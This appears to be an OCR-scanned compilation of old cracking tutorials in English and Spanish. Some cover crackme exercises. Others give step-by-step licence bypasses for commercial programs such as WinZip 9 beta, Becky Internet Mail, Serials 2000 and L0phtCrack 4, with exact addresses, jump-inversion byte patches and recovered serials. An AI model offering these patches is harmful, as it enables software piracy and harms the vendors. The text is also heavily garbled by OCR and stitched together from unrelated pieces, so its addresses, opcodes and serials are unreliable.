:00460D5A 8B55D8 mov edx, dword ptr [ebp-28] 
:00460D5D 0F80A 6020000 jo 00461009 

:00460D63 03CA add ecx, edx ->add total 

:00460D65 0F809E020000 jo 00461009 

:00460D6B 894DD8 mov dword ptr [ebp-28], ecx 
:00460D6E 8D4DCC lea ecx, dword ptr [ebp-34] 


* Reference To: MSVBVMG60.  vbaFreeStr, Ord:0000h 


| 
:00460D71 FF155C1 14000 Call dword ptr [0040115C] 
:00460D77 8D4DAO lea ecx, dword ptr [ebp-60] 


* Reference To: MSVBVMG60.  vbaFreeVar, Ord:0000h 


| 
:00460D7A FF1514104000 Call dword ptr [00401014] 
:00460D80 8BC3 mov eax, ebx 


:00460D82 03C7 add eax, edi 
:00460D84 0F807F020000 jo 00461009 
:00460D8A 8BF8 mov edi, eax 
:00460D8C EB88 ¡mp 00460D16 ->loop 


The last add total of the loop you second serial will be in ecx dec. Convert to HEX 


Now we add the 2 parts together but you must remember each serial is in HEX and must be 4 
digits in length. So if your result is FE1 you add the O to make it 4 digits OFE1 


S5CBOOFE1 
You should have enough info to make your own keygen. 


Jack 
RedBlIkJckOusa.net 


Which is harder, vb appz compiled in native code or vb appz compiled to pcode? The answer: It depends! Yes, it 
depends on the measure of security employed by the author and the tools used by the cracker. In this case, a disabled 
button is simply too hard to crack specially if the button's property was initially set to disabled. There are two versions 
of this crackme. One compiled to native code, the other to pcode. We will try to crack the latter and demonstrate how 
easy 1t is to crack a pcoded application using a relatively new tool. 


Tools Needed 

Exdec 

Any hex editor 

Exdec by JosephCo <--- members.xoom.com/c4n4ever/.space/ 
enableme2.exe <--- www.kickme.to/tnt (crackme) 


The Protection 


A disabled button. The crackme is compiled to vb6 p-code. 


The essay 

After carefully studying our target, we know for a fact that the only thing we can do to crack this crackme is by 
patching. But where? We will study the crackme using exdec. Run exdec and choose File, then Disassemble Prog. 
Choose the location of your crackme. Next, exdec should show you the following snippets: 


[nacio SOÍP == no--- l 

Proc: 40575c 

405698: f4 LitI2_Byte: 0x0 0 (.) <---------- push 0 

40569A: 21 FLdPrThis 

40569B: 0f VCallAd command <---------- command button 


40569E: 19 FStAdFunc local_0088 


4056A1: 08 FLdPr local_0088 

4056A4: 0d VCallHresult_CPUSH_vtbl::put_ ipropeEN ABLEDPUSH 
4056A09: la FFreel Ad local_0088 

A4056AC: 04 FLdRfVar local_008C 

4056AF: 04 FLdRfVar local_0088 

4056B2: 05 ImpAdLdRf: 4062cc 

4056B5: 24 NewIfNullPr 404684 

4056B8: 0d VCallHresult 6 70344792 

4056BD: 08 FLdPr local_0088 


Proc: 404f5c 


404F44: f4 LitI2_Byte: 0x0 0 (.) <------------ push 0 
404F46: 21 FLdPrThis 
404F47: Of VCallAd command <--===-=----- command button 


404F4A: 19 FStAdFunc local_0088 

404F4D: 08 FLdPr local_0088 

404F50: 0d VCallHresult_CPUSH_vtbl::put_ iproprEN ABLEDPUSH 
404F55: la FFreel Ad local_0088 

404F58: 13 ExitProcHresult 


Searching for a call to the API EnableMenultem is futile. VB disables/enables 1t's button using the _VbaObjSet. Most 
object properties that are changed during runtime passes through this call. Usually, to disable a property there is a push 
00000000 and to enable a property there is a push FFEFFFFFF. Anyway, you will not find this call either in this crackme 
because 1t is pcoded. But still, knowing that to disable a button vb needs to push 0's, let's see 1f exdec reports such a 
push. In our snippet there are two instances. Location 405698 and location 404144. Note however that the snippet just 
above this paragraph appears several times in exdec in different addresses. I only cut and showed a mere example. Just 
the same, we will see the occurrence of the same instructions. This means that whatever we patch at the snippet, you 
should also do with the rest. Ok, now what do we do? The instruction at 405698 and 404F44 is two bytes long (¡.e. 
FA0O). These instructions are equivalent to Push 00. We will change this to Push FF (1.e. FAFP). 


Now, note all the locations where this insruction appears: 
f4 LitI2_Byte: 0x0 0 (.) 


In my count, there are at least 32 occurrences of these instructions. These means you have to patch all these locations. 
Now we need to know the file offset of these locations. If you still dont know how to use w32dasm to get the file offset 
of such locations, read my previous tutorials I published at GC's site. Moving on, after carefully noting our offset 
adress, we will now open the crackme in a hex editor. Seek each location and replace FAOO with FAFF. After this test 
your crackme... Well? Nope! The button is enabled but it doesnt close. Why? Well do you see these instructions in 
exdec? 


[nacio SMA no --- e] 
40277E: Lead1/c8 End <------ ends (kills) a task 
noc SOÍP 2 e] 


No you wont see those instructions! These only me one thing, the author probably forgot to put these vb codes in his 
crackme: 


Private Sub OnClick() 
End 
End Sub 


Anyway our task was to enable the button, right? And we did it! Let's see 1f we can crack the other version (native 
code). 


GC, Nuclear Crackers, TNT, Xasx(?), JosephCo(?), EB and as always TheSandman. 
Final Words 


T am puting up a site. This one is a dedicated VB cracking site. Let me know if this is a good Idea. 
mail me ===>>> balitog Ejoymail.com (so I will know somebody loves me =0) 
TNT 30 Demian DOS CrackME 


Tools Needed 
TR252 (Pre TRW 2000 for DOS) 


OK... 
Ths file is packed. UPX? So you got to stay with the code 
till you get the ¡mp to unpacked code. No dumping needed. 


2897:00A2 8D866F03 LEA AX,[BP+036F] 

2897:00A6 8EDO MOV SS, AX 

2897:00A8 BC8000 MOV SP,0080 

2897:00AB EA00001E25 JMP FAR 251E:0000 <- Here 


F10 Trace through. 
Now we are in unpacked. 
Trace down till you get the call _main 


251E:0149 FF368800 PUSH [WORD __COenviron] 
251E:014D FF368600 PUSH [WORD _ COargv] 
251E:0151 FF368400 PUSH [WORD __COargc] 
251E:0155 E81103 CALL _main <- Here 


FS Step into the call. 

OK gonna save you some time. All the next calls are for the graphic 
screen. You are looking for the call _gets 

g 144b The first one is your Name, Second is serial. 


251E:144B ESDF17 CALL _ gets <- Name 
251E:144E 59 POP CX 

251E:144F B81200 MOV AX,0012 
251E:1452 50 PUSH AX 

251E:1453 B82700 MOV AX,0027 
251E:1456 50 PUSH AX 

251E:1457 ESODOD CALL _gotoxy 
251E:145A 59 POP CX 

251E:145B 59 POP CX 

251E:145C 8D8648FE LEA AX,[BP+FE 
251E:1460 50 PUSH AX 

251E:1461 ESC917 CALL _ gets <- Serial 
251E:1464 59 POP CX 


Now continus to trace and you come to a call _makecode 

FS Step in 1f you want to watch your Serial get generated. 

I followed through and it seems like a endless loop of reading a hard 

coded serial and www.demianthecracker.com Converts the names to upper case 
some math and out comes the number. I've been up too long and have no 
patience to keep the loops going. Alot of it was moving strings. 

Look at BX AX DX to watch your name and serial. 


251E:1492 8D8638FF LEA AX,[BP+FF38] 


251E:1496 50 PUSH AX 
251E:1497 ES4EEE CALL _makecode <- Do the math 


Or you can see your good serial in memory after the call. 
251E:1497 Es4EEE CALL _makecode 

251E:149A 83C406 ADD SP,06 

251E:149D C7063E060000 MOV [WORD _1],0000 
251E:14C7 8D8648FE -> LEA AX,[BP+FE48] 
251E:14CB 50 PUSH AX <- Display AX, BX, DX 
Hit D AX and you see bad serial. 

Hit D BX and you see good serial. 

Black Jack 

5342-4758-64633 

Done 

Jack 

El Pollo 

37213186472154587365 

Solucion Crackme CrkMeViz.exe by: CrkViz 
Numero de registro: 57230198 


solucion by: Karpoff 


Demian VC ++ Crack Me 

Por ACE 

La POSTDATA: Apenado acerca de mi mal inglés. 
Las herramientas usadas: 


- Softlce 4.05 (protools.cjb.net) - Frogsice (protools.cjb.net) 


Vamos! 


Inicie el programa, vemos un diálogo con dos textbox donde podemos introducir nuestro nombre y nuestro número de 
serie. Introduzca estas informaciones: 

El nombre : Agriéteme 

La novela por entregas : 3215555987 Dan un clic sobre botón Check, Lo que ocurre el programa estaba cerrado. Lo que 
ocurre, Eso detecta Softlce. Así lounch Frogsice y principio el programa otra vez entonces introducen las informaciones 
citadas anteriormente..... El error:¡Incorect Serial!. 

El siguiente paso es reingresar el Informations de arriba y no da un clic sobre botón Check todavía, el fuego arriba de 
Softlce colocó breakpoit: 

Bpx getwindowtexta enter 

La prensa FS al que volver el programa At el botón de chasquido del programa Check, deberíamos echar para atrás para 
Softlce. Prensa F11....La grieta Me.. Ese es nuestro nombre, prensa F5...La grieta Me.. ¿Pero la espera vio que usted 
que número de 16 dígitos justo debajo de nuestro nombre, que pudo ser el número de serie?. Hagamos un intento, 
despeje todo breakpoint: 

Bc enter 

La prensa FS al que volver el programa introduce Crack Me como el nombre y esta vez entra el número de 16 dígitos 
que encontramos antes de (1273418555103155) entonces botón de chasquido Check, FELICITACIÓN 


Eso es eso que obtuvimos el número de serie. 


Demian VC++ Crack Me 


id id td A 


PS : Sorry about my bad english. 


tools used : 
- Softlce 4.05 ( protools.cjb.net ) 
- Frogsice ( protools.cjb.net ) 


Let's Go ! 


Start the program, we see a dialog with two textbox where we can enter our name and serial number. Enter these 
informations : 

Name : Crack Me 

Serial : 3215555987 

Click Check button, What happen the program was closed. What happen, It detect Softlce. So lounch Frogsice and start 
the program again then enter the above informations..... Error:Incorect Serial!. 


Next step is to reenter the above Informations and don't click Check button yet, fire up Softlce set breakpoit : 

bpx getwindowtexta [enter] 

press FS to go back to the program 

At the program click Check button, we should back to Softlce. Press F11....Crack Me.. that's our name, press F5 

... Crack Me.. but wait did you see that 16 digit number just below our name, could it be the serial number ?. Let's try, 
clear all breakpoint : 

bc * [enter] 

press FS to go back to the program 

enter Crack Me as the name and this time enter the 16 digit number that we found before (1273418555103155) then 
click Check button, CONGRATULATION! 


that's 1t we got the serial number. 


MangaPoker Shareware V 1.0 
Nombre: +gr0O0vy 
Cereal: 12987-sam-8801c-pokermanga-126 


Mini tutorial: 

Bueno lo primero que hay que hacer 2.0000 000 00 CA DAD LL PROA CO 

SYMBOL LOADER y lo ejecutaste, y apretaste ctrl.+d para salir del SICE!!!!) es poner un bpx 
hmemcpy para frenar el SICE (softice) cuando compara el cereal con el trucho. Una vez echo 
esto, vas a ver que paramos en la librería kernel32 que no es la que nos sirve, la que nos sirve el la 
de vb 4, para llegar a esta apreten F12 varias veces hasta que en la linea verde aparezca algo 
como VB4... una ves ahí hagan lo que viene a continuación. 
Como este programa esta hecho en VB4, es muy facil encontrar el serial por que alguien descubrio 
donde se hacen las comparaciones en la libreria vb4run (no se si se escribe asi), para encontrar 
el lugar donde se hace la comparacion de tu cereal y el verdadero tenes que poner en el Soft Ice 
(sice de ahora en mas) 
S OL FFEFFFFFF 56,57,8B,7C,24,10,8B,74,24,0C,8B,4C,24,14,33,C0,F3,66,A7 (este codigo es valido 
en todos los programas de vb4 no vb5 ni vb6!!!) el resultado de esta búsqueda (pueden haber 
varios en este shareware encontre como 10 pero la primera es la que funciona) te dara 
una direccion, a la cual vas a tener que ir con el comando g xxxxwvoo000xxx (las x representan la 
direccion obtenida en la busqueda). Una ves que fuiste a la direccion vas a ver que el programa 
hace varias cosas con los registros. Una ves ahí hace un d xxx donde xxx es el nombre del registro 
a explorar (me parece que fue un de esi o un d edi no me acuerdo) y en la ventana de datos 
te aparecera el cerealz que en mi caso fue ¿22/2000 co 01 o po rermoncs- 10 (no seran tan 
mal0rs de poner mi cereal!!!!) 


BUENO ESPERO QUE LES HALLA GUSTADO MI TUTORIAL (no sere como +0ORC ni +estado porcino 
pero....), Y QUE QUEDE CLARO QUE PARA SEGUIRLO VAS A TENER QUE CONOCER ALGO DE SICE 
Y ASSAMBLER POR QUE SINO VAS MUERTO. ESTOY ESCRIBIENDO UN MANUAL DE CRACKING QUE 
ESPERO QUE PRONTO SALGA A LA LUZ ASI QUE LOS NEWBIEZ ESPEREN Y NO PIERDAN LA 
ESPERANZA!!! 
+gr00vy 


Crackeando passwords Windows en segundos 
Enviado el Martes, 29 julio de 2004 a las 21:53:59 por Tampico 


Un equipo de investigadores suizos ha descubierto un nuevo sistema capaz de decodificar contraseñas Windows de 
manera acelerada en pocos segundos... 


El procedimiento de decodificación, que ha sido desarrollado por un equipo encabezado por Philippe Oechslin, del 
Laboratorio de Criptografía y Seguridad del Instituto Federal de Tecnología Suizo, emplea los valores hash de las 
contraseñas Windows y es capaz de desvelar claves alfanuméricas en cuestión de segundos. 

La técnica, que emplea una variación de la popular herramienta LOphCrack, utiliza gigantescas tablas en donde se 
almacenan hashes junto con las contraseñas originales, lo que agiliza enormemente los cálculos necesarios para 
romper los códigos. 


Los investigadores han habilitado una página que permite a cualquiera probar la técnica, para lo cual tan solo deberá 
proporcionar los hashes de sus contraseñas y comprobar atónito como esta es decodificada en la web. 


La página corre bajo un AMD 2500+ con 1.5 gigas de RAM y es capaz de averiguar el 99,9% de las todo tipo de 
contraseñas que solo incluyan letras y números en una media de 5 segundos. 


http://lasecpc13.epfl.ch/nterack 


CRACKEANDO SERIALS 2000 


Espero que no se hallan salteado todas las explicaciones por que no me gustaria crear 
larvas que lo unico que hacen es seguir los pasos del tutorial como lelos sin entender 
nada OK? 


Bueno, esta parte del cracking, (aunque digan que es para lammers, malors o algo de 
eso) es la que mas importa, ya que es facil, eficiente (yo logre crackear cientos de 
programas conocidos con esta tecnica aunque no lo crean), aparte al ser la que 
primero se aprende y es facil, es la que te hara emocionar, y te dara la experanza de 
que va a poder aprender a crackear, que no es tan dificil, etc. 


El metodo que voy a explicar consta de: 

Ubicar por medio de las String References (o de una busqueda de texto) es cartelito 
que te dice que el codigo no es valido. Luego vuscar unas referencias al codigo y 
cambiar un jne por un je (esto no funciona siempre con todos los programas (proba 
con el Mirc y vas a ver) solo funciona con aquellos que al pasar a la Nag de 
felicitaciones crean una entrada en el registro o un fichero que llaman cada ves que se 
ejecutan para ver si estan o no registrados) 


Bueno todo esto lo vamos a pasar a practico con el serials 2000 (vieron que es el 
mejor programa de serials y la proteccion de mierda que le pusieron???) 


Paso 1: 

Desensamblemos el serials 2k. 

Paso 2 

Abramos el serias 2k y vallamos a File/Administration tools 

Una ves ahí pongan cuaquier password, y veran que les sale esta ventana: 


“amino 


Incorrect Password 


Apunten en su cuaderno del cracker la string Incorrect Password. 
Paso 3: 

Busquemos la string que anotamos “Incorrect Password” 
Aterrizamos aca: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
|:00402940(C) 
l 


* Possible StringData Ref from Data 0b3j ->"lNarning" 
l 


:004029F4 68BE8834100 push 004183B3 
| 

:004029F9 6844834100 push 00418344 

:004029FE 6400 push 00000000 


* Reference To: USER32.MessageBoxA, Ord:0195h 
| 
: 00402400 FF1528374100 Call dvord ptr [00413728] 


Paso 4: Ahora miren, donde dice Referenced by a ......... at Address: 004029A00, 
Esto quiere decir que el mensaje fue llamado por un jump condicional o incondicional 
desde la direccion 004029A0. 

Lo que nosotros tenemos que hacer es ir a esa direccion apretando el boton GO TO CD 
LOCATION y poniendo 00402940 

Una ves que lo pusimos aparecemos aca: 


:0040299E S85C0 test eax, eax 

:00402942 8D4C2404 lea ecx, dword ptr [esp+04] 
200402946 ESS55EGFFFF call 00401000 

:D004029A4B 8D4C2400 lea ecx, dword ptr [esp] 
:004029A4F Cós84249401000001 mov byte ptr [esp+00000194], Ol 


* Reference To: MFC42.Ordinal:09D2, Ord:09DZ2h 
l 


:004029B7 ESBECDS80000 Call 00410278 
:004029BC 8D8C24A0000000 lea ecx, dword ptr [esp+000000140] 
:004029C03 Có6S4249401000003 mov byte ptr [esp+00000194], 03 


* Reference To: MFC42.0rdinal:0320, Ord:0320h 
l 


:004029CB ESCED90000 Call 0041039E 
:004029D0 8D4C2460 lea ecx, dword ptr [esp+60] 
:004029D4 Cós4249401000002 mov byte ptr [esp+00000194], 02 


* Reference To: MFC42.0Ordinal:0261, Ord:0261h 
ÑÍ ; 

Line:4152 Pg 83 and 84 of 772 Code Data (2:00402940 GOffset 00001DADh in File:Serial2k.exe 
Vemos que hay un test que seria como una comprovacion entre dos registros eax y 
eaxX y (los registros son sectores de memoria utilizados para guardar datos p ej 
numeros de serie etc) si son iguales nos manda a el mensaje de error. 
Ahora lo que tenemos que hacer es ir a el HexWorksHop y cambiar 7452 por 7552 (no 
lo podes cambiar en cualquier lado fijate en el offset [YA LO EXPLIQUE ARRIBAJ 
Bueno una ves cambiado guarda el archivo como Serial2k_Cracked.exe y probalo!!! 
VAMOS A VER SIN FUNCIONO!!! 


How to crack Winzip 9.0 BETA (5480) 


Dificultad: Facil 
Herramientas: W32Dasm y HexWorkShop 


Web: www.winzip.com 
Cracker: gr00vy 


Empezemos por decir que esta version no es muy diferente la forma de crackearlo a la de los 
anteriores Winzip's. Ahora vamos a los bifes. 


Intalamos, y ejecutamos. Vemos una nag: 


Ahora le damos Enter Registration Code: 
Uhmm todo igual a los demas, bueno veamos que hacer cuando le damos un serial asi medio random 
Y.... Aparece una ventana que dice: 


Incomplete or incorrect information 


Ok. Ahora desensamblamos el programa con el W32Dasm y buscamos la cadena Incomplete or incorrect 
information. 


La vemos mas o menos por aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
:0040CDC8 (C), :0040CDD1(C), :0040CDDA (C) 


:0040CE23 ESBDF7FFFF call 0040C5E5 
* Possible Reference to String di ID=00654: "Incomplete or incorrect information" 
:0040CE28 688E020000 push 0000028E 
:0040CE2D ES0AAAO500 call 0046783C 
:0040CE32 50 push eax 
:0040CE33 53 push ebx 
:0040CE34 6A3D push 0000003D 
:0040CE36 E857890400 call 00455792 
:0040CE3B 83C410 add esp, 00000010 
:0040CE3E FF0520604D00 inc dword ptr [004D6020] 
:0040CE44 833D20604D0003 cmp dword ptr [004D6020], 00000003 
:0040CE4B 0F85F8000000 jne 0040CF49 
:0040CE51 6A00 push 00000000 


Lo que esta en negrita son las direcciones de los saltos que llaman al cartel de Mal. Asi que 
veamos que es lo que hay en c/u de esas direcciones: 


:0040CDBF 803DE0814D0000 cmp byte ptr [004D81E0], 00 
// Comprueba si el nombre esta o no 

:0040CDC6 59 pop ecx 

:0040CDC7 59 pop ecx 

:0040CDC8 7459 je 0040CE23 

:0040CDCA 803D0C824D0000 cmp byte ptr [004D820C]1, 00 
// Lo mismo de arriba pero este comprueba el serial si esta o no 

:0040CDD1 7450 je 0040CE23 

:0040CDD3 E864FCFFEF call 0040CA3C 
// Una llamada importante, al parecer es la que genera/comprueba el serial 

:0040CDD8 84C0 test al, al 

:0040CDDA 7447 je 0040CE23 


Lo que podriamos hacer aca es invertir los saltos esos y ver que pasa. Pero.. mejor sigamos 
adelante: 


Ahroa estamos dentro de la call importante, vemos esto: 


* Referenced by a CALL at Addresses: 
:00401063 , :00404578 , :00404AC2 , :0040CDD3 , 00459245 


:0040CA3C 55 push ebp 

:0040CA3D 8BEC mov ebp, esp 

:0040CA3F 81EC40030000 sub esp, 00000340 

:0040CA45 A1204B4D00 mov eax, dword ptr [004D4B20] 
:0040CAZA 334504 xor eax, dword ptr [ebp+04] 
:0040CA4D 803DE0814D0000 cmp byte ptr [004D81E0]1, 00 
:0040CA54 8945FC mov dword ptr [ebp-04], eax 
:0040CA57 7507 jne 0040CA60 

:0040CA59 32C0 xor al, al 

:0040CA5B E945020000 jmp 0040CCA5 


Uhmmm cuantas call para conprobar el serial, veamos que hay adentro de cada una de ellas: 


Ahora dentro de 00401063: 


:00401063 E8D4B90000 call 0040CA3C 

:00401068 84C0 test al, al 

:0040106A 746E je 004010DA << invertimos 106a 
Ahora dentro de 00404578: 

:00404578 E8BF840000 call 0040CA3C 

:0040457D 84C0 test al, al 
:0040457F 7409 je 0040458A << invertimos 457f 
Ahora dentro de 00404AC2: 

:00404AC2 E8757F0000 call 0040CA3C 

:00404AC7 84C0 test al, al 
:00404AC9 “7516 jne 00404AE1 << invertimos 4ac9 


// invirtiendo esto sacamos el titulo de Beta Test, asi que hara tenemos la final release 
// Del winzip 9 :P 


:00404ACB E8AODOFEEF call 00401B70 
:00404AD0O 84C0 test al, al 
:00404AD2 740D je 00404AE1 
* Possible StringData Ref from Data Ob] ->" (Beta test)" << Interesante, miren lo que pasa :P 
Ahora dentro de 0040CDD3: 
:0040CDD3 E864FCFEEF call 0040CA3C 
:0040CDD8 84C0 test al, al 
:0040CDDA 7447 je 0040CE23 
Ahora dentro de 00459245: 
:00459245 E8F237EFBEF call 0040CA3C 
:0045924A 84C0 test al, al 
:0045924C 0F8492000000 je 004592E4 


Uhmm a mi me parece que invertir todos esos saltos seria mas que suficiente para que el programa 
este registrado. Tonces hacemos los cambios y ejecutamos. Je vemos que no muestra nag ni el titulo 
de beta test! Juaz! Lo logramos. 

Ahh pero... no me fije adelantando los dias del reloj de windows a ver que pasa. 

Aparece una ventana que dice: 


This Pre-release Beta versión of winzip is quite Old 


Uhhh que garron!!! Bueno veamos que podemos hacer con esto 


Anotamos la string y la buscamos en el W32Dasm: 


:00401BED E8300C0600 call 00462822 

:00401BF2 83C410 add esp, 00000010 

:00401BF5 85C0 test eax, eax 
:00401BF7 7427 je 00401C20 


* Possible StringData Ref from Data Ob] ->"This PRE-RELEASE BETA version " 
| =>"of WinZip is quite old." 


:00401BFB 68981C4D00 push 004D1C98 
:00401C00 BE287D4D00 mov esi, 004D7D28 
:00401C05 56 push esi 


Jejej veamos que tiene de interesante esto en 00401BF7 tenemos un Je, vemos que pasa si lo 
invertimos: 
No nos salta la ventanita de old version 


Bueno creo que eso es todo, si falta algo... mandenme la solucion por mail por que no tengo mas 


ganas de seguir con el crack este :P 


Como crackear el Becky InternetMail Version 1.26.02 by gr00vy 


Web: www.zencracking.com.ar 
Cracker: gr00vy 

E-mail: groovy26000 yahoo.com.ar 
Tools: W32Dasm y HExWorkshop 
Dificultad: Protozoo ( ¿Se escribe asi? ) 


Uhmmm y yo que habia pensado que no iba a crackear mas, aca estoy con un nuevo tutorial. Bueno esta ves que un programa que po lo poco que lo 
use parece muyyy pedorro , jo, pero es lo unico que tenia disponible. 


Bueno comenzamos desensamblando el EXE, una vez desensamblado, ejecutamos el proggie y vemos que nos pone una nag, nos vamos a donde 
dice que entremos el Serial, Mail y Nombre e ingresamos esos dato. Apretamos Ok y vemos que nos dice "The pass code is no correct". Bueno, 


vamos a el W32Dasm y buscamos esa string, y vemos algo asi: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


|:00470111(C) 

| 

:004701ED 6AFF push FEFEFFEF 
:004701EF 6A00 push 00000000 


* Possible Reference to String Resource ID=60469: "The pass code is not correct." 


:004701F1 6835EC0000 push 0000EC35 
:004701F6 E88D4C0300 call 004A4E88 


Si sigueron algun otro tutorial van a ver que eso de Referenced by... es bastante sospechoso, vamo s a ver que hay en esa direccion: 


:0047010A ES5FA 1 FFFF call 0046A26E 
:0047010F 85C0 test eax, eax 
:00470111 0F85D6000000 jne 004701ED 


Interesan, que pasaria si lo noopeamos?? Ok, les digo yo, el msg de codigo invalido no aparece mas. Bueno con el hexeditor abran, vallan al offset y 
reemplazen 0F85D6000000 con 90's 

Ok, arrancamos de nuevo el programa y nos dice, "The pass code is illegal." Uhmm bueno, debe ser una comprovacion del serial al inicio del 
proggie, asi que busquemos esa string la encontramos en: 


:0046AC4F E81 AF6FFFF call 0046A26E 
:0046AC54 85C0 test eax, eax 
:0046AC56 0F848C010000 je 0046ADES 
:0046AC5C 6A00 push 00000000 
:0046AC5SE 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"The pass code is illegal." 


:0046AC60 68480A4E00 push 004E0A48 
:0046AC65 ESE6A 10300 call 004A4E50 
:0046AC6A 53 push ebx 


Ok, como vemos, hay un je, que seguramente si se ejecuta, nos salta el msgbox de The pass code is illegal. ok, que podemos hacer? Convertirlo a 
jmp ?? Nahh algo mas facil, invirtamos el salto, cambiando 0f84 por 0f85, una ves hecho esto el programa se ejecuta toalmente registrado! 


Bueno espero que les guste este simple tutorial. 


Salu2 gente de irc.vmlinuz.com.ar, irc.ciudad.com.ar Hroot Haudio y gente de www.fixednet.com.ar 


TUTORIAL: Cómo crackear el LOpth Crack 4.0 
Una alternativa al tutorial de Groovy. 


Por Belzebú, 22/05/03 


Programa....... Lopth Crack 4.0 


Descarga......... http://www.atstake.com/research/Ic/application/Ic4setup.exe 


Objetivo............ Hacer ke cualkier “Unlock code” introducido sea válido y así registrar el programa. 
Herramientas...W32Dasm, Softlce, un Editor Hexadecimal y CodeFusion 
INTRODUCCIÓN 


Este tutorial es una alternativa al documento que publicó Groovy en su web 
htto://www.zencracking.com.ar. Recomiendo descargar y leer previamente aquel tutorial 


DESARROLLO 


En la solución planteada por Groovy me pareció muy pesado el ir “nopeando” todos los saltos posteriores a 
la llamada a la función donde se comprueba la clave, así que decidí investigar un poco más esa 
CALL 0042789B 


:00411C06 83C410 add esp, 00000010 

:00411C09 85CO0 test eax, eax 

:00411C0B 7523 jne 00411C30 ==> Si el "Unlock Code" introducido no es correcto salta a la zona TRIAL 
:00411C0D 8B07 mov eax, dword ptr [edi] 

:00411C0F 50 push eax 

* Possible StringData Ref from Data Obj ->"Unlock Code" 


| 
:00411C10 6850134700 push 00471350 
* Possible StringData Ref from Data Obj ->"Registration" + Sin comentarios 


| 

:00411C15 685C134700 push 0047135C 

:00411C1A 8BCE mov ecx, esi 

:00411C1C 899E3C010000 mov dword ptr [esi+0000013C], ebx 

:00411C22 E89AB20300 call 0044CEC1 

:00411C27 53 push ebx 

:00411C28 53 push ebx 

* Possible StringData Ref from Data Obj ->"You have successfully registered " 3 Sin comentarios 
->"LC4." 


| 
:00411C29 6834144700 push 00471434 
:00411C2E EB07 ¡mp 00411C37 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:00411C0B(C) 


| 

:00411C30 53 push ebx ==> ZONA TRIAL 

:00411C31 53 push ebx 

* Possible StringData Ref from Data Obj ->"You have entered an invalid code. " 
->"Please try again." 


:00411C32 6800144700 push 00471400 


A continuación pasé el LC4 por el Softice, poniendo un BPX 00411C01. Al ir a registrar el programa 
introduciendo cualkier clave, lógicamente salta el breakpoint. Si en ese momento escribimos en el softice: 
D EAX veremos la clave introducida por nosotros 
y si hacemos: 

D EDX veremos el "Unlock Code" correcto correspondiente al Serial number del programa. 

En mi caso, para un serial Code 1727b4112, el "Unlock correcto" es ea677a. 

Siguiendo con el Softice estudié por ké camino iba la ejecución del LC4, dentro de la llamada de 
comprobación del la clave, cuando la clave introducida no era la correcta. 

El Código de la CALL 00427896: 


Esta es la salida de la CALL 0042789B, ke devuelve si el "Unlock Code" introducido es correcto o no. 
La forma ke tiene de decirlo es: 


Si devuelve EAX=1, la clave introducida es INCORRECTA 
Si devuelve EAX=0, la clave introducida es CORRECTA. 


Estos valores para EAX se generan en CALL 0042E280, ke es donde se verifica uno a uno ke los 
caracteres introducidos de la clave coinciden con la correcta: 


* Referenced by a CALL at Addresses: 
1:004038DF , :00403C3F , :00404FDA , :004050E5 , :004278B3 


| 
:0042E280 55 push ebp 


:0042E281 8BEC mov ebp, esp 

:0042E283 57 push edi ==>Ahí va ahora la clave introducida 
:0042E284 56 push esi==>Ahí va ahora la clave correcta 
:0042E285 53 push ebx 

:0042E286 8B750C mov esi, dword ptr [ebp+0C] 

:0042E289 8B7D08 mov edi, dword ptr [ebp+08] 

:0042E28C 8D05740E6B0O0 lea eax, dword ptr [006B0E74] 
:0042E292 83780800 cmp dword ptr [eax+08], 00000000 
:0042E296 753B jne 0042E2D3 

:0042E298 BOFF mov al, FF 

:0042E29A 8BFF mov edi, edi 

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:0042E2A8(C), :0042E2C8(C) 


| 
:0042E29C OACO or al, al==>TENER EN CUENTA 


:0042E29E 742E je 0042E2CE ==>Cuando ha terminado de comprobar uno a uno los caracteres de la clave 
este salto nos saca del bucle de comprobación. TENER EN CUENTA!!! 


:0042E2A0 8A06 mov al, byte ptr [esi] ==> Se toma el primer carácter de la clave correcta contenida en "esi" y se pone en "al" 
:0042E2A2 46 inc esi ==> se incrementa uno para pasar al próximo carácter de la clave correcta 

:0042E2A3 8A27 mov ah, byte ptr [edi] ==> Se toma el primer carácter de la clave introducida contenida en "edi" y se pone en "ah" 
:0042E2A5 47 inc edi ==> se incrementa uno para pasar al próximo carácter de la clave introducida 

:0042E2A6 38C4 cmp ah, al ==> Akí se comparan ambos caracteres 

:0042E2A8 74F2 je 0042E29C ==> Si son iguales salta atrás para comprobar el siguiente carácter 

:0042E2AA 2C41 sub al, 41 Si no son iguales al final de todas las operaciones EAX=1=TRIAL. VER MAS ABAJO 
:0042E2AC 3C1A cmp al, 1A 

:0042E2AE 1AC9 sbb cl, cl 

:0042E2B0 80E120 and cl, 20 

:0042E2B3 02C1 add al, cl 

:0042E2B5 0441 add al, 41 

:0042E2B7 86E0 xchg al, ah 

:0042E2B9 2C41 sub al, 41 

:0042E2BB 3C1A cmp al, 1A 

:0042E2BD 1AC9 sbb cl, cl 

:0042E2BF 80E120 and cl, 20 

:0042E2C2 02C1 add al, cl 

:0042E2C4 0441 add al, 41 

:0042E2C6 38E0 cmp al, ah 

:0042E2C8 74D2 je 0042E29C 

:0042E2CA 1ACO sbb al, al 

:0042E2CC 1CFF sbb al, FF 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:0042E29E(C) 


:0042E2CE OFBECO movsx eax, al ==> Akí se asigna a EAX el valor O0O=REGISTRADO ó 1=TRIAL, 
y depende del valor ke ha tomado "al" en las operaciones anteriores 
:0042E2D1 EB78 jmp 0042E34B. 


SOLUCION PROPUESTA 
Con todo lo anterior, la solución planteada consta de 2 pasos: 


PASO 1 
No me interesa ke compruebe ningún carácter entre la clave introducida y la correcta por lo tanto el salto: 


:0042E29E 742E je 0042E2CE 
lo sustituyo por: 
:0042E29E EB2E ¡mp 0042E2CE 


Con este cambio no se efectuará la comprobación, pero debemos asegurarnos de ke "al" tenga el valor ke 


nos convenga a nosotros es decir, ke "al"=0 para que en MOVSX eax, al, EAX=0=REGISTRADO. 


Para conseguir ke EAX=0, en la instrucción previa al salto ke acabamos de modificar, hacemos lo siguiente: 


:0042E29C OACO or al, al 


lo sustituyo por : 


:0042E29C B000 mov al, 00 


Tras estos cambios acepta cualkier clave introducida como correcta. En esta alternativa se modifican 
